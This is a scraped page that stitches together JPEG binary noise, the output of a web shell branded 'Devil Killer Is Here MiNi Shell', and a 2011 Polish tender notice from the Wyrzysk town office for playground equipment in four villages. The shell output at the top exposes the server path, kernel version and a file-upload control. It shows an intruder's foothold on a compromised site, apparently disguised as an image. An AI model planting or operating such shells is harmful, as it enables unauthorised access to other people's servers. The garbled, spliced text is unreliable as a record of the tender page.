JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111026/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111026/280805-N-2011.html

<p class="kh_header"><b>Wyrzysk: Czas na relaks - miejsce wypoczynku dla dzieci i dorosłych - place zabaw i elementy zagospodarowania terenu na place zabaw.</b><br>
<b>Numer ogłoszenia: 280805 - 2011; data zamieszczenia: 26.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Wyrzysku , ul. Bydgoska 29, 89-300 Wyrzysk, woj. wielkopolskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wyrzysk.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Czas na relaks - miejsce wypoczynku dla dzieci i dorosłych - place zabaw i elementy zagospodarowania terenu na place zabaw..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1 Przedmiotem zamówienia są cztery oddzielne zadania polegające na dostawie i montażu urządzeń placów zabaw na terenie Falmierowa, Gromadna, Auguścina i Dobrzyniewa w tym:
1) Zadanie 1 pn. Plac zabaw w miejscowości Falmierowo:
a) huśtawka 2-osobowa - 1 szt.,
b) huśtawka wagowa 2-osobowa - 1 szt.,
c) bujak na sprężynie - konik - 1 szt.,
d) ścianka zręcznościowa - 1szt.,
e) zestaw do zabaw - 1 szt.,
f) regulamin placu - 1 szt,
g) ławka parkowa - 4 szt.,
h) kosz na śmieci - 2 szt.
2) Zadanie 2 pn. Plac zabaw w miejscowości Gromadno:
a) huśtawka 2-osobowa - 1 szt.,
b) huśtawka wagowa 2-osobowa - 1 szt.,
c) bujak na sprężynie - konik - 1 szt.,
d) ścianka zręcznościowa - 1szt.,
e) zestaw do zabaw - 1 szt.,
f) regulamin placu - 1 szt,
g) ławka parkowa - 4 szt.,
h) kosz na śmieci - 2 szt.
3) Zadanie 3 pn. Plac zabaw w miejscowości Auguścin:
a) huśtawka 2-osobowa - 1 szt.,
b) huśtawka wagowa 2-osobowa - 1 szt.,
c) bujak na sprężynie - konik - 1 szt.,
d) ścianka zręcznościowa - 1szt.,
e) zestaw do zabaw - 1 szt.,
f) regulamin placu - 1 szt,
g) ławka parkowa - 4 szt.,
h) kosz na śmieci - 2 szt.
4) Zadanie 4 pn. Plac zabaw w miejscowości Dobrzyniewo:
a) huśtawka 2-osobowa - 1 szt.,
b) huśtawka wagowa 2-osobowa - 1 szt.,
c) bujak na sprężynie - konik - 1 szt.,
d) ścianka zręcznościowa - 1szt.,
e) regulamin placu - 1 szt,

2. Parametry techniczne:

1)huśtawka 2 osobowa: Wymiary: około h 200cm sz. 450cm dł. 200cm. Podpory - profil stalowy zamknięty (100-120x100-120mmx4-6mm), belka drewniana z drewna klejonego (120-140x120-140mm) lub belka drewniana bezrdzeniowa o średnicy min. 120 mm, górna belka - profil stalowy (80-100x80-100x4-6mm), belka drewniana z drewna klejonego (100-120x100-120mm) lub belka drewniana bezrdzeniowa o średnicy min. 120 mm . Profile stalowe zamknięte, ocynkowane ogniowo, malowane farbami akrylowymi odpornymi na działanie promieni UV. Belki drewniane malowane lakierem, lakierobejcą lub farbami akrylowymi odpornymi na działanie promieni UV. Łańcuchy kalibrowane ze stali chromowej. Siedziska gumowe lub siedziska drewniane zabezpieczone farbą wodoodporna. Montaż na gotowych prefabrykatach betonowych, zbrojonych, do wkopania.

2)huśtawka wagowa 2 osobowa: Wymiary: około h 55cm, długość belki wagowej około 300cm. Konstrukcja nośna - profil stalowy zamknięty (100-120x100-120mmx4-6mm), belka drewniana drewna klejonego (120-140x120-140mm) lub belka drewniana bezrdzeniowa o średnicy min. 120 mm, wzmocniona rurkami (30-35x2-4mm), belka wagowe - profil stalowy (80-100x80-100x4-6mm), belka drewniana z drewna klejonego (100-120x140-160mm) lub belka drewniana bezrdzeniowa o średnicy min. 120 mm, siedzisko - sklejka wodoodporna (18-25 mm) malowana farbami akrylowymi odpornymi na działanie promieni UV lub gumowe. Uchwyt - rurka (30-35x2mm). Przegub huśtawki na tulejach teflonowych nie wymagających konserwacji i obsługi. Profile stalowe zamknięte, ocynkowane ogniowo, malowane farbami akrylowymi odpornymi na działanie promieni UV. Belki drewniane malowane lakierem, lakierobejcą lub farbami akrylowymi odpornymi na działanie promieni UV. Montaż na gotowych prefabrykatach betonowych, zbrojonych, do wkopania oraz dwie opony jako odboje (wkopane).

3)bujak na sprężynie (konik): urządzenie wykonane z płyty HDPE (18-25 mm) lub ze sklejki wodoodpornej (18-25mm) malowane farbami akrylowymi odpornymi na działanie promieni UV. Sprężyna stalowa o przekroju 20-30mm, elementy metalowe ocynkowane metoda ogniową i malowane farbami akrylowymi odpornymi na działanie promieni UV. Montaż na gotowym prefabrykacie betonowym, zbrojonym, do wkopania.

4)ścianka zręcznościowa: Wysokość ok.200cm, szerokość około 150cm. Konstrukcja wykonana z profili stalowych zamkniętych (80-100x80-100x4-6mm), belek drewnianych z drewna klejonego (100-120mm x100-120mm) lub belek drewnianych bezrdzeniowych o średnicy min. 120 mm, zakończonych kapturkami stalowymi. Profile stalowe zamknięte, ocynkowane ogniowo, malowane farbami akrylowymi odpornymi na działanie promieni UV. Belki drewniane malowane lakierem, lakierobejcą lub farbami akrylowymi odpornymi na działanie promieni UV. Wypełnienie - krata prostokątna lin stalowych w oplocie z polipropylenu (16-25mm), łączki z tworzywa. Montaż na gotowych prefabrykatach betonowych do wkopania.

5)zestaw do zabaw: Zestaw jako sześciokąt o wymiarach około dł. boku 100-120cm i wysokość 210 cm. W skład zestawu wchodzi min. 5 elementów zabawowych w tym ścianka wspinaczkowa, drabinka pionowa prosta, lina wspinaczkowa. Całość - konstrukcja wykonana z profili stalowych zamkniętych (100-120x100-120x4-6mm), belek drewnianych z drewna klejonego (120-140x120-140mm) lub belek drewnianych bezrdzeniowych o średnicy min. 120 mm. Wszystkie elementy stalowe ocynkowane ogniowo i malowane farbami akrylowymi odpornymi na działanie promieni UV. Elementy z drewna malowane lakierobejcą lub farbami akrylowymi odpornymi na działanie promieni UV. Ścianka wspinaczkowa wykonana ze sklejki wodoodpornej gr. min. 21 mm, drabinka wykonana z liny stalowej w oplocie polipropylenowym lub drewniana. Montaż na gotowych prefabrykatach betonowych, zbrojonych, do wkopania.

6)regulamin placu zabaw: Konstrukcja wykonana z profila stalowego zamkniętego 30-50x30-50mm lub belki drewnianej od min. 100x100mm. Wypełnienie - blacha aluminiowa lub drewno, wszystkie elementy metalowe - ocynkowane ogniowo, pomalowane farbami akrylowymi odpornymi na działanie promieni UV. Elementy z drewna malowane lakierobejcą lub farbami akrylowymi odpornymi na działanie promieni UV. Montaż na gotowych prefabrykatach betonowych, zbrojonych, do wkopania.

7)ławka parkowa bez oparcia: Wymiary około: szerokość 40cm długość 160cm wysokość 45cm. Betonowe podpory wykonane z wibrowanego żelbetonu B30 wraz z zakotwiczonymi dyblami lub z profilami stalowymi do montażu listew. Listwy z drewna o wymiarach około 38x120x1500mm. Wszystkie elementy stalowe ocynkowane ogniowo i malowane farbami akrylowymi odpornymi na działanie promieni UV. Elementy z drewna malowane lakierobejcą lub farbami akrylowymi odpornymi na działanie promieni UV.

8)kosz na śmieci: Metalowy do montażu na rurze stalowej o przekroju 35-45mm. Kosz z blachy o grubości 2-3mm i pojemność około 35l. Wszystkie elementy stalowe ocynkowane ogniowo i malowane farbami akrylowymi odpornymi na działanie promieni UV. Montaż na gotowym prefabrykacie betonowym, zbrojonym, do wkopania.


Kolorystyka: kolory z wyłączeniem koloru białego i żółtego, farby odporne na działanie światła słonecznego (UV).

Wszystkie urządzenia zastosowane na placach zabaw dla dzieci powinny być wykonane zgodnie z wymogami normy PN-EN 1176 (wyposażenie placów zabaw i wymagania bezpieczeństwa) oraz posiadać certyfikaty lub atesty bezpieczeństwa dopuszczające urządzenia zabawowe do użytkowania na ogólno dostępnych, zewnętrznych placach zabaw i terenach rekreacyjnych wydane przez instytucje lub zakłady  certyfikujące uprawnione do wydawania takich certyfikatów lub atestów bezpieczeństwa
Certyfikaty, deklaracje zgodności z normą PN-EN 1176 dla każdego urządzenia zabawowego należy dołączyć do oferty przetargowej.
Wykonawca obowiązany jest załączyć do oferty opis techniczny poszczególnych urządzeń zabawowych zawierający parametry danego urządzenia celem wykazania, iż dane urządzenie spełnia określone przez Zamawiającego parametry techniczne.
3. Inne uwarunkowania dotyczące realizacji zamówienia:
1) Posadowienie urządzeń zabawowych powinno uwzględniać zachowanie stref bezpieczeństwa pomiędzy urządzeniami zgodnie z projektem załączonym do specyfikacji. 
2) Dostawa i montaż nowych urządzeń zabawowych będą realizowane przez wykonawcę własnym transportem i na własny koszt.
3) Urządzenia muszą być fabrycznie nowe i nie mogą być przedmiotem praw osób trzecich. 
4) Urządzenia powinny być zabezpieczone przed korozją i wpływami atmosferycznymi na okres nie mniejszy niż udzielona gwarancja, posiadać wysoką jakość i trwałość oraz zapewnić bezpieczeństwo korzystającym z tych urządzeń dzieci. 
5) Urządzenia powinny być zamontowane w gruncie na kotwach (nie dotyczy urządzeń metalowych). W przypadku elementów drewnianych, które mają kontakt z ziemią, muszą być one zaimpregnowane zgodnie z obowiązującymi normami. Posadowienie urządzeń jest przedstawiony graficznie w szkicach i stanowi integralną cześć specyfikacji istotnych warunków zamówienia ( SIWZ część III).

4. Dokonanie wszelkich opłat i uzgodnień związanych z realizacją inwestycji wynikających wprost z dokumentacji, jak również niezbędne do wykonania zamówienia, np. podatek VAT, koszty ubezpieczenia, wszelkie roboty przygotowawcze, porządkowe, zagospodarowanie placu budowy, koszty utrzymania zaplecza budowy (naprawy, woda, energia elektryczna, telefon, dozorowanie budowy), dokumentacje powykonawczą, zysk, itp.
5. Wykonawca może złożyć ofertę na jedno lub kilka zadań. Wykonawca obowiązany jest zaznaczyć na które zadanie składa ofertę. Zamawiający przyjmuje, iż Wykonawca przystępując do jednego lub kilku zadań może złożyć tylko jeden formularz ofertowy wraz z wymaganymi oświadczeniami i dokumentami. Składając jeden formularz ofertowy Wykonawca zobowiązany jest do złożenia odpowiedniej ilości formularzy cenowych (dotyczy poszczególnych zadań do których Wykonawca przystępuje)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium:
Zadanie 1 pn. Plac zabaw w miejscowości Falmierowo w wysokości 400 zł
Zadanie 2 pn. Plac zabaw w miejscowości Gromadno w wysokości 400 zł
Zadanie 3 pn. Plac zabaw w miejscowości Auguścin w wysokości 400 zł
Zadanie 4 pn. Plac zabaw w miejscowości Dobrzyniewo w wysokości 200 zł

Wykonawca wnoszący wadium zobowiązany jest zaznaczyć, na które zadanie wnosi wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania niezbędnej wiedzy i doświadczenia Wykonawca winien udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie, iż zrealizował w okresie ostatnich 5 lat co najmniej 1 zadanie odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia za kwotę nie mniejszą niż 50.000 zł.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca wykaże, że dysponuje osobą uprawnioną do kierowania robotami budowlanymi w specjalności konstrukcyjno budowlanej,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku dotyczącego odpowiedniej sytuacji ekonomiczno - finansowej wykonawca wykaże, iż:
a) posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę min 200.000,00 zł.
b) posiadać rachunek ze środkami finansowymi lub zdolność kredytową w banku lub w spółdzielczej kasie oszczędnościowo - kredytowej na poziomie minimum 50.000,00 zł,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)zmiany wynagrodzenia Wykonawcy za wykonanie zamówienia w następujących przypadkach:
a)zmniejszenie zakresu prac przez Zamawiającego w przypadku powzięcia informacji, że wykonanie robót nie leży w interesie publicznym;
b)zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym zmiany ustawowej stawki podatku od towarów i usług VAT;
Zmiana wynagrodzenia nastąpi proporcjonalnie do wielkości ograniczenia robót oraz o różnicę w podatku VAT.
2)zmiany terminu wykonania zamówienia w następujących przypadkach:
a)wystąpienia siły wyższej. Siła wyższa oznacza wydarzenia zewnętrzne, nieprzewidywalne, nieoczekiwane i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu, przy czym strona może się powołać na zaistnienie siły wyższej tylko wtedy, gdy poinformuje w formie pisemnej drugą stronę w ciągu 3 dni od dnia jej zaistnienia.
b) wystąpienia w trakcie realizacji zamówienia zmian przepisów prawa krajowego, co wpłynie na realizację zamówienia i spowoduje konieczność dostosowania opracowania do zmian przepisów;
c) prowadzenia prac archeologicznych;
d) wystąpienia niekorzystnych warunków atmosferycznych tj. intensywnych opadów deszczu, gradu i śniegu oraz spadku temperatury w dzień poniżej -10°C, przy czym strona może się powołać na zaistnienie niekorzystnych warunków atmosferycznych tylko wtedy, gdy poinformuje w formie pisemnej drugą stronę w ciągu 3 dni od dnia ich zaistnienia.
Termin realizacji ulegnie przedłużeniu o czas wstrzymania robót z wyżej wymienionych przyczyn.
3)zmiany osób wskazanych w umowie po stronie Zamawiającego jak i po stronie Wykonawcy o których mowa w §2 umowy. Zamawiający zaakceptuje osoby wskazane przez Wykonawcę jeśli posiadają kwalifikacje i doświadczenie takie same lub wyższe od osób wymienionych w wykazie osób załączonym do SIWZ.
4)podwykonawców oraz zakresu robót im powierzonych,
5)zmiany postanowień § 7 ust. 11 pkt 1) umowy ze względu na potrzeby Zamawiającego.
6)zmiany harmonogramu rzeczowo - finansowego ze względu na potrzeby Zamawiającego.</p>
